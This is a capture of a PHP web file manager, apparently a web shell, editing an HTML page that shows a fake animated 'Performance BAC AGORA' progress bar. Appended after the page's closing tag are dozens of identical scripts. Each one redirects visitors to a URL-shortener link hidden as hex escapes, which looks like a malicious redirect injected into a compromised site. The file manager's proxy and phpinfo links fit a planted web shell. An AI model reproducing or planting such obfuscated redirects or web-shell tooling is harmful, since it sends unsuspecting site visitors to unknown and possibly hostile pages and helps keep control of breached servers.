Gestionnaire de fichiers - Editer - /home/pactamm/www/evaluation/blocanime0000003.html
Arrière
<!DOCTYPE html> <html lang="fr"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Performance BAC AGORA</title> <!-- Bootstrap CSS --> <link href="https://cdnjs.cloudflare.com/ajax/libs/bootstrap/5.3.2/css/bootstrap.min.css" rel="stylesheet"> <!-- Chart.js --> <script src="https://cdn.jsdelivr.net/npm/chart.js@3.9.1/dist/chart.min.js"></script> <style> .evaluation-charts { padding: 2rem 0; background-color: #f5f5f7; min-height: 100vh; display: flex; align-items: center; } .chart-container { position: relative; height: 120px; background: #ffffff; border-radius: 8px; padding: 1rem; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05); } .card { transition: transform 0.3s ease, box-shadow 0.3s ease; background: #ffffff; border-radius: 10px; border: 1px solid #e0e0e0; box-shadow: 0 2px 4px rgba(0, 0, 0, 0.05); } .card:hover { transform: translateY(-3px); box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); } .card-header { background: #4d4d51; border-bottom: 1px solid #e0e0e0; border-radius: 10px 10px 0 0 !important; color: white; padding: 1rem 1.25rem; } .card-header small { font-size: 0.85rem; opacity: 0.9; font-family: system-ui, -apple-system, sans-serif; display: block; margin-top: 0.5rem; animation: fadeInOut 2s infinite; } @keyframes fadeInOut { 0% { opacity: 0.7; } 50% { opacity: 1; } 100% { opacity: 0.7; } } h6.card-title { font-weight: 500; font-family: system-ui, -apple-system, sans-serif; margin: 0; font-size: 1.1rem; color: white; } @media (max-width: 768px) { .chart-container { height: 100px; padding: 0.75rem; } .card-header { padding: 0.75rem 1rem; } } </style> </head> <body> <section class="evaluation-charts"> <div class="container"> <div class="row justify-content-center"> <div class="col-12 col-md-8"> <div class="card"> <div class="card-header"> <h6 class="card-title">Performance de BAC AGORA em processus statistique...</h6> </div> <div class="card-body"> <div class="chart-container"> <canvas id="progressChart"></canvas> </div> </div> </div> </div> </div> </div> </section> <script> window.onload = function() { const ctx = document.getElementById('progressChart').getContext('2d'); // Criar gradiente const gradient = ctx.createLinearGradient(0, 0, ctx.canvas.width, 0); gradient.addColorStop(0, '#4d4d51'); gradient.addColorStop(1, '#909396'); const progressChart = new Chart(ctx, { type: 'bar', data: { labels: ['Progression'], datasets: [{ data: [0], backgroundColor: gradient, borderWidth: 0, barThickness: 20 }] }, options: { indexAxis: 'y', responsive: true, maintainAspectRatio: false, plugins: { legend: { display: false }, tooltip: { backgroundColor: '#ffffff', titleColor: '#4d4d51', bodyColor: '#4d4d51', borderColor: '#e0e0e0', borderWidth: 1, padding: 10, callbacks: { label: function(context) { return Math.round(context.parsed.x) + '%'; } } } }, scales: { x: { beginAtZero: true, max: 100, grid: { display: true, color: '#e0e0e0', drawBorder: false }, ticks: { font: { size: 11 }, color: '#4d4d51', callback: function(value) { return value + '%'; } } }, y: { display: false } }, animation: { duration: 1000 } } }); // Função de animação function animateProgress() { let progress = 0; const duration = 6000; // 3 segundos para cada ciclo const step = 100 / (duration / 16); // 16ms é aproximadamente 1 frame em 60fps function update() { progress = (progress + step) % 101; // Reset quando chegar a 101 progressChart.data.datasets[0].data = [progress]; progressChart.update('none'); requestAnimationFrame(update); } update(); } // Iniciar animação animateProgress(); }; </script> </body> </html> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script> <script>window.location.href = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x75\x73\x68\x6f\x72\x74\x2e\x74\x6f\x64\x61\x79\x2f\x65\x58\x62\x77\x56\x76\x63\x30\x72\x39";</script>
| ver. 1.4 |
Github
|
.
| PHP 5.4.45 | Génération de la page: 0 |
proxy
|
phpinfo
|
Réglages